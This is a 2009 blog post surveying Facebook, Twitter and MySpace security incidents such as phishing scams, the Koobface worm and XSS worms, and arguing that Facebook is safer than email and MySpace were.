Selasa, 19 Mei 2009

New Facebook Attacks: In Context

facebookwormFor news and advice on today’s Facebook scam, please see the article WARNING: Do Not Click Facebook Links to Ponbon.im

It seems that Facebook scams have been in the news a great deal recently: from the password-stealing phishing attack in April to the FBAction scam the following day to the “justfuns” scam early this month and the “ponbon” scam today. Twitter hasn’t been immune to attack either: numerous variants of the “mikeyy” worm took over user accounts last month, posting unwanted Tweets in user streams.

Are these attacks anything new? Not at all, and you could make the case that this new generation of social networks is somewhat more secure than what went before them.


The MySpace Days


MySpace LogoFacebook is increasingly taking the place of two forms of communication: MySpace (MySpace reviews) and email. MySpace in its day was a security nightmare: the feature that allowed you to embed code into your page created a hacker’s paradise, opening up the ability to execute cross-site scripting (XSS attacks) that grabbed a user’s credentials just by visiting a MySpace profile - no need to click a link or enter any details.

Even without malicious scripts, this was easily done: just create a fake MySpace login form and place it on a MySpace page, then wait for a few hundred users to enter their details and add the form to their pages too. MySpace had to severely limit this “custom code” feature to prevent these attacks, which destroyed the functionality of many MySpace add-ons, and thus the ecosystem around MySpace.


Facebook and Twitter Attacks


Facebook (Facebook reviews) isn’t nearly as vulnerable to XSS attacks since embedding code in your page is not a major part of the experience. The biggest Facebook attack so far - the Koobface worm (artist’s impression above) - instead relied on users clicking a link in a Facebook message and visiting a site to download a file. Other attacks relied upon users entering their Facebook login details on third party sites.

Twitter (Twitter reviews), however, was vulnerable to XSS attacks because hackers realized that you could place rogue code into the “location” field of a profile - this was a major security hole since it required nothing more than visiting a page to get your account compromised. In addition, Twitter’s viral nature dramatically increased the speed the attack was able to spread at. However, Twitter now claims to have closed this hole.

Facebook is also much safer than email: when a phishing link is found, Facebook can disable it centrally, removing it from all messages across the site. The difference is that we’ve learned to be cautious about links in emails, while we’ve learned to be very trusting of links in Facebook messages from friends. The Facebook threat is a trust issue, not a technical one with the Facebook site.

So while Facebook attacks might seem unpleasant, take comfort in the fact that Facebook is much more secure than what came before it.